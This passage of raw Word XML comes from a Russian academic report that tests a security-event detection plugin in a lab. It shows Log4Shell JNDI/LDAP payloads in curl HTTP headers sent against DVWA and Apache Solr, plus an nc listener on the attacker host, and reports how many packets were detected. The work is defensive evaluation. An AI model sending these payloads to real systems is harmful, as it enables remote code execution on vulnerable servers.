          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная категория охватывает уязвимости, связанные с отсутствием или недостаточной регистрацией событий безопасности, что позволяет злоумышленникам длительное время оставаться незамеченными в скомпрометированной системе. В рамках разработанного программного комплекса реализован журнал аудита, фиксирующий ключевые события безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550AD33A" w14:textId="00425745" w:rsidR="008E0171" w:rsidRPr="00687033" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для тестирования использовалась уязвимость Log4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidR="009534A2" w:rsidRPr="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [17]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>— критическая уязвимость в библиотеке журналирования Apache Log4j, широко применяемой в Java-приложениях. Суть атаки заключается в том, что злоумышленник передаёт специально сформированную строку в любое поле, которое попадает в журнал — заголовок HTTP запроса, параметр URL и так далее. Библиотека Log4j обрабатывает эту строку и устанавливает соединение с сервером злоумышленника, что позволяет выполнить произвольный код на уязвимой машине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B562955"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687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тестирование проводилось в двух сценариях.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сценарий 1 — Log4Shell на веб-приложении DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DVWA написано на PHP и не использует библиотеку Log4j, поэтому данная уязвимость в нём отсутствует. Тем не менее тест был проведён для проверки реакции системы обнаружения на характерные признаки атаки в HTTP заголовках:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A00412" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00687033" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537C6829" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00687033" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4D545" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00687033" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl -H 'User-Agent: ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://192.168.0.101:1389/exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}' http://192.168.0.104/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426692E1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00687033" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl -H 'X-Forwarded-For: ${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>://192.168.0.101:1389/a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}' http://192.168.0.104/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DA145" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>curl- H 'Referer: ${</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jndi:ldap://192.168.0.101:1389/b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}' </w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="00687033">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http://192.168.0.104/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41D619CA" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="009534A2" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC0C49C" w14:textId="7EAAB924" w:rsidR="008E0171" w:rsidRPr="006A2536"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 обнаружения данной атаки показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114367EC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00BB36F3" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F674A4" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2754B303" wp14:editId="6F976E23">
            <wp:extent cx="6218345" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10637453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45357" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6231633" cy="2615427"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72922A50" w14:textId="33307936" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение нарушения прав доступа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F2B3FF" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="003643FB" w:rsidRDefault="000A1CD6" w:rsidP="006605C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6E342C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00687033"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связи с описанными выше условиями плагин обнаружил лишь 2 вредоносных пакета, основываясь исключительно на количестве запросов и нестандартных заголовках.</w:t>
      </w:r>
      <w:r w:rsidRPr="00687033">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий 2 — Log4Shell на уязвимом Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AD47897" w14:textId="58923272"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687033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С атакующей машины был отправлен запрос с вредоносной строкой в параметре:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422F8CAA" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRPr="00687033" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24231565" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00687033">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 'http://192.168.0.104:8983/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/admin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>collections?action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=$ {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jndi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A47B5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: ldap://192.168.0.101:1389/Exploit}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211A58D0" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E088B3" w14:textId="4D332EEB" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат работы показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E8F074" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D81D3D0" wp14:editId="77CF9667">
            <wp:extent cx="6068879" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="1275456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56860" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6072616" cy="2592395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D592D" w14:textId="6FC80879" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
